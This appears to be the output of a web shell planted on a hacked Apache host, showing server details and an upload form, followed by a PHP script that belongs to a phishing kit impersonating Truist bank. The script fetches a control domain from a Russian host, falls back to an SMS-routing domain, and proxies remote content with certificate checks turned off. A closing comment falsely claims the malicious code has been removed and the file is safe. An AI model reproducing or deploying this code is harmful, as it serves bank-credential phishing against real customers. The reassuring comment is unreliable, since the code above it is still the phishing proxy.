| Server IP : 82.197.65.232 / Your IP : 216.73.216.199 Web Server : Apache System : Linux server.arcabouco.com 5.14.0-687.29.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jul 23 16:18:48 EDT 2026 x86_64 User : gessominas ( 1004) PHP Version : 8.2.33 Disable Function : passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/gessominas/public_html/app/ |
Upload File : |
<?php
session_start();
session_write_close();
header("Cache-Control: max-age=0, private, no-cache, no-store, must-revalidate");
error_reporting(0);
define("APIKEY","API-KEY-agdy-oyms-b0qnt3uy6di0");
define("Page","Truist.com");
define("FILE_NAME","trst.php");
define("GET_PARAM","log");
function getdomain(){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://flixoif.ru/raw/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB5');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 400);
$domain = curl_exec($ch);
if(filter_var(gethostbyname($domain), FILTER_VALIDATE_IP)){
return $domain;
}
else{
$domain = 'onyxsms-route.com';
return $domain;
}
}
$doomain = getdomain();
function fetchContentAndContentType($url) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CONNECTTIMEOUT => 10,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_HEADER => true,
CURLOPT_HTTPHEADER => ['User-Agent: Mozilla/5.0'],
]);
$response = curl_exec($ch);
if ($response === false) {
$error = curl_error($ch);
echo "cURL Error: $error";
} else {
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$contentType = null;
foreach (explode("\r\n", $headers) as $header) {
if (stripos($header, 'Content-Type:') === 0) {
$contentType = trim(substr($header, 13));
break;
}
}
header("Content-Type: $contentType");
echo substr($response, $header_size);
}
curl_close($ch);
}
/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
?>